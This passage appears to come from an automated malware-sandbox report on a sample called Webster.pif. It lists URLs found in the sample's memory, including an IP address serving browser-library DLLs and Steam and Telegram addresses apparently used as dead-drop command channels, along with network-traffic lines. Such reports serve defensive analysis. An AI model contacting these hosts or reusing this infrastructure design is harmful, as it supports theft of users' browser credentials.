                        Source: Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/softokn3.dllI
                        Source: Webster.pif, 0000000B.00000002.3321827446.0000000001854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/softokn3.dllNm
                        Source: Webster.pif, 0000000B.00000002.3321760579.00000000017DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/sqls.dll
                        Source: Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/ts8
                        Source: Webster.pif, 0000000B.00000002.3321827446.0000000001854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/vcruntime140.dll
                        Source: Webster.pif, 0000000B.00000002.3322725102.000000000495E000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60CBAFIJ
                        Source: AEGHJK.11.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: 76561199747278259[1].htm.11.drString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                        Source: Webster.pif, 0000000B.00000002.3321932371.0000000001937000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322051688.0000000001A73000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321976352.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, DAAAFB.11.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
                        Source: Webster.pif, 0000000B.00000002.3321932371.0000000001937000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322051688.0000000001A73000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321976352.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, DAAAFB.11.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
                        Source: AEGHJK.11.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: AEGHJK.11.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                        Source: AEGHJK.11.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=eZOyL2UG5OX8&a
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=3eYWCMu_
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=e0OV
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=54OKIvHlOQzF&l=e
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                        Source: 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&l=en
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                        Source: Webster.pif, 0000000B.00000002.3321932371.0000000001937000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322051688.0000000001A73000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321976352.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, DAAAFB.11.drString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
                        Source: Webster.pif, 0000000B.00000002.3321932371.0000000001937000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322051688.0000000001A73000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321976352.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, DAAAFB.11.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                        Source: AEGHJK.11.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: AEGHJK.11.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: AEGHJK.11.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://help.steampowered.com/en/
                        Source: DAAAFB.11.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                        Source: Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3332106889.000000001986D000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3329824044.00000000138F2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: https://mozilla.org0/
                        Source: 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/discussions/
                        Source: Webster.pif, 0000000B.00000002.3321760579.00000000017DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/fi
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                        Source: 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199747278259
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/market/
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                        Source: Webster.pif, 0000000B.00000003.2876365347.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322120004.0000000001B1E000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876421018.0000000001938000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876471328.00000000018B1000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322725102.00000000047F1000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322120004.0000000001B4B000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321760579.0000000001795000.00000004.00000020.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321760579.00000000017DA000.00000004.00000020.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876514280.0000000001B4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259/badges
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321827446.0000000001854000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259/inventory/
                        Source: Webster.pif, 0000000B.00000002.3321760579.00000000017DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259:
                        Source: Webster.pif, 0000000B.00000003.2876365347.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322120004.0000000001B1E000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876421018.0000000001938000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876471328.00000000018B1000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322725102.00000000047F1000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322120004.0000000001B4B000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321760579.0000000001795000.00000004.00000020.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876514280.0000000001B4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259gi_z2Mozilla/5.0
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/workshop/
                        Source: 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/
                        Source: 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/about/
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/explore/
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/legal/
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/mobile
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/news/
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/points/shop/
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privac
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/stats/
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                        Source: KFIJJE.11.drString found in binary or memory: https://support.mozilla.org
                        Source: KFIJJE.11.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                        Source: KFIJJE.11.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
                        Source: Webster.pif, 0000000B.00000003.2876365347.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322120004.0000000001B1E000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876421018.0000000001938000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876471328.00000000018B1000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322725102.00000000047F1000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322120004.0000000001B4B000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321760579.0000000001795000.00000004.00000020.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876514280.0000000001B4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/armad2a
                        Source: Webster.pif, 0000000B.00000003.2876365347.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322120004.0000000001B1E000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876421018.0000000001938000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876471328.00000000018B1000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322725102.00000000047F1000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322120004.0000000001B4B000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321760579.0000000001795000.00000004.00000020.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876514280.0000000001B4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/armad2ahellosqls.dllsqlite3.dllIn
                        Source: Webster.pif, 0000000B.00000002.3321932371.0000000001937000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322051688.0000000001A73000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321976352.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, DAAAFB.11.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
                        Source: file.exe, 00000000.00000003.2091955830.00000000026C6000.00000004.00000020.00020000.00000000.sdmp, Swim.0.dr, Webster.pif.2.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                        Source: Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3332106889.000000001986D000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3329824044.00000000138F2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: https://www.digicert.com/CPS0
                        Source: AEGHJK.11.drString found in binary or memory: https://www.ecosia.org/newtab/
                        Source: Webster.pif.2.drString found in binary or memory: https://www.globalsign.com/repository/0
                        Source: file.exe, 00000000.00000003.2091955830.00000000026C6000.00000004.00000020.00020000.00000000.sdmp, Swim.0.dr, Webster.pif.2.drString found in binary or memory: https://www.globalsign.com/repository/06
                        Source: AEGHJK.11.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: KFIJJE.11.drString found in binary or memory: https://www.mozilla.org
                        Source: KFIJJE.11.drString found in binary or memory: https://www.mozilla.org#
                        Source: Webster.pif, 0000000B.00000002.3326384673.000000000C73F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                        Source: KFIJJE.11.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                        Source: Webster.pif, 0000000B.00000002.3326384673.000000000C73F000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322725102.000000000495E000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                        Source: KFIJJE.11.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                        Source: KFIJJE.11.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                        Source: Webster.pif, 0000000B.00000002.3321932371.0000000001937000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322051688.0000000001A73000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321976352.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, DAAAFB.11.drString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
                        Source: Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64181
                        Source: unknownNetwork traffic detected: HTTP traffic on port 64177 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64180
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64183
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64182
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64185
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64184
